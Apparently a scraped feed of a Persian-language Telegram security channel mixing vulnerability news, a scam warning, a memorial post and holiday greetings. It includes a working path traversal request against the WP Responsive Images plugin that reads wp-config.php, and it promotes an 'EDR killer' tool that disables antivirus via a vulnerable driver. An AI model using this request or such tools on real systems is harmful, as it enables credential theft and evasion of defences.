Forwarded from ARVIN
امروز به برسی آسیب پذیری Path Traversalدر پلاگین وردپرس WP Responsive Images می پردازیم
در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه!
https://www.cve.org/CVERecord?id=CVE-2026-1557
در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه!
https://www.cve.org/CVERecord?id=CVE-2026-1557
❤3
Forwarded from ARVIN
ARVIN
امروز به برسی آسیب پذیری Path Traversalدر پلاگین وردپرس WP Responsive Images می پردازیم در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه! https://www.cve.org/CVERecord?id=CVE-2026-1557
GET /wp-content/plugins/wp-responsive-images/image_handler.php?src=../../../../wp-config.php HTTP/1.1
Host: localhost
❤6
حاج عباسو بفرستیم مذاکره با تریاژر های باگکراد 😂😂
P1 -> P999999999999999
تضمینی😂😂
P1 -> P999999999999999
تضمینی😂😂
🔥4😁3🤪2😎1
RadvanSec
حاج عباسو بفرستیم مذاکره با تریاژر های باگکراد 😂😂 P1 -> P999999999999999 تضمینی😂😂
Better Call Abbas
😁5🤪1
EDR Killer
با استفاده از یک اسیب پذیری در درایور wsftprm.sys آنتی ویروس ها و EDR رو از کار میندازه
https://github.com/ThanniKudam/TopazTerminator
تست کردید بگید ببینیم چطوره 👍
با استفاده از یک اسیب پذیری در درایور wsftprm.sys آنتی ویروس ها و EDR رو از کار میندازه
https://github.com/ThanniKudam/TopazTerminator
تست کردید بگید ببینیم چطوره 👍
GitHub
GitHub - ThanniKudam/TopazTerminator: Just another EDR killer
Just another EDR killer. Contribute to ThanniKudam/TopazTerminator development by creating an account on GitHub.
👍4❤1
1⃣ CVE-2026-2441:
Google Chrome Blink RCE
2⃣ CVE-2026-27896:
Bypassing Security Controls in MCP Go SDK
3⃣ CVE-2026-20841:
Windows Notepad RCE
4⃣ CVE-2026-20817:
Windows Error Reporting ALPC Privilege Escalation
5⃣ CVE-2026-25253:
Clawdbot/Moltbot/OpenClaw One-click RCE
⭐️ @radvansec
Google Chrome Blink RCE
2⃣ CVE-2026-27896:
Bypassing Security Controls in MCP Go SDK
3⃣ CVE-2026-20841:
Windows Notepad RCE
4⃣ CVE-2026-20817:
Windows Error Reporting ALPC Privilege Escalation
5⃣ CVE-2026-25253:
Clawdbot/Moltbot/OpenClaw One-click RCE
⭐️ @radvansec
❤4
برای روتر های Juniper سری PTS آسیب پذیری با کد شناسایی CVE-2026-21902 از نوع RCE منتشر شده است که به هکرها امکان اجرای کد با دسترسی ROOT و در نهایت کنترل کامل بر روی روتر را می دهد. ورژن های 25.4 دارای این آسیب پذیری می باشند .
⭐️ @RadvanSec
⭐️ @RadvanSec
❤3
RadvanSec
1⃣ CVE-2026-2441: Google Chrome Blink RCE 2⃣ CVE-2026-27896: Bypassing Security Controls in MCP Go SDK 3⃣ CVE-2026-20841: Windows Notepad RCE 4⃣ CVE-2026-20817: Windows Error Reporting ALPC Privilege Escalation 5⃣ CVE-2026-25253: Clawdbot/Moltbot/OpenClaw…
CVE-2026-2472
Unauthenticated and Stored Cross-Site Scripting (XSS) in google-cloud-aiplatform _genai/_evals_visualization (Vertex AI Python SDK) affecting Jupyter/Colab.
Technical PoC
Unauthenticated and Stored Cross-Site Scripting (XSS) in google-cloud-aiplatform _genai/_evals_visualization (Vertex AI Python SDK) affecting Jupyter/Colab.
Technical PoC
❤4👍1
Forwarded from PentesterLand Academy - Public
عزیزان حواستون باشه مبالغ فضایی که برای وی پی ان میگن رو به اسم استار نکنند تو پاچتون
بعد از اتصال خروجی شما باید به شکل عکس باشه
کانفیگ استارلینک یعنی خروجیه ایپیتون این چنین isp و نشون بده
غیر از این بود یعنی تانل
اونی که تو این وضعیت سعی میکنه از مردم بکشه و سو استفاده کنه رو هم مورد عنایت قرار دادم که شرف نداره
سعی کنید اول تستی بگیرید دابل چک کنید بعد بخرید
اره خلاصه
(برای دیدن خروجی از سایت چک هاست استفاده کنید)
https://check-host.net
بعد از اتصال خروجی شما باید به شکل عکس باشه
کانفیگ استارلینک یعنی خروجیه ایپیتون این چنین isp و نشون بده
غیر از این بود یعنی تانل
اونی که تو این وضعیت سعی میکنه از مردم بکشه و سو استفاده کنه رو هم مورد عنایت قرار دادم که شرف نداره
سعی کنید اول تستی بگیرید دابل چک کنید بعد بخرید
اره خلاصه
(برای دیدن خروجی از سایت چک هاست استفاده کنید)
https://check-host.net
❤2
Forwarded from PentesterLand Academy - Public
در همه جای دنیا
کار پشت سیستمی و اینترنتی پایدار ترین کاره و همه مردم ارزوشونه همچین مدل کاری رو داشته باشند
دلیل؟ نیاز به رفت امد و هزینه ها جانبی نداره و بازدهیش به مراتب بالاتره
ولی در ایران؟ اولین کار قطعی شدید
واقعا چرا؟ یعنی کسی نیست بگه این قطعی ها چقدر باعث نابودی کسب و کارها و انگیزه جوانان و فکر به مهاجرت میشه؟ و علاوه براون دریافت نکردن اپدیت ها امنیتی چه خطرات سنگینی رو به همراه میاره؟
کار پشت سیستمی و اینترنتی پایدار ترین کاره و همه مردم ارزوشونه همچین مدل کاری رو داشته باشند
دلیل؟ نیاز به رفت امد و هزینه ها جانبی نداره و بازدهیش به مراتب بالاتره
ولی در ایران؟ اولین کار قطعی شدید
واقعا چرا؟ یعنی کسی نیست بگه این قطعی ها چقدر باعث نابودی کسب و کارها و انگیزه جوانان و فکر به مهاجرت میشه؟ و علاوه براون دریافت نکردن اپدیت ها امنیتی چه خطرات سنگینی رو به همراه میاره؟
❤3
GO-TO CVE
امروز دوباره دلهامون سنگینتر از همیشهست...
شهید مهدی حسینی، یکی از بچههای خوب و حوزه امنیت رفیق و همکار خیلیهامون روز سوم جنگ به درجه رفیع شهادت رسید.
روحش شاد، یادش گرامی، راهش پررهرو باد.
خدایا به خانواده داغدارش صبر عظیم عطا کن و ما رو هم در مسیر دوستان شهدمان ثابتقدم بدار.
برای مهدی و پوریا 💔💔💔💔
شهید مهدی حسینی، یکی از بچههای خوب و حوزه امنیت رفیق و همکار خیلیهامون روز سوم جنگ به درجه رفیع شهادت رسید.
روحش شاد، یادش گرامی، راهش پررهرو باد.
خدایا به خانواده داغدارش صبر عظیم عطا کن و ما رو هم در مسیر دوستان شهدمان ثابتقدم بدار.
برای مهدی و پوریا 💔💔💔💔
خدا هم مهدی هم پوریا رو رحمت کنه امیدوارم روحشون قرین رحمت و نعمت الهی باشه🤲
❤7
عید نوروز بر همگان مبارک و فرخنده باد🙏❤️
امیدوارم سال خوبی برای تمامی مردمان سرزمینمون باشه همراه با سربلندی , آرامش و صلح 🤲
امیدوارم سال خوبی برای تمامی مردمان سرزمینمون باشه همراه با سربلندی , آرامش و صلح 🤲
❤2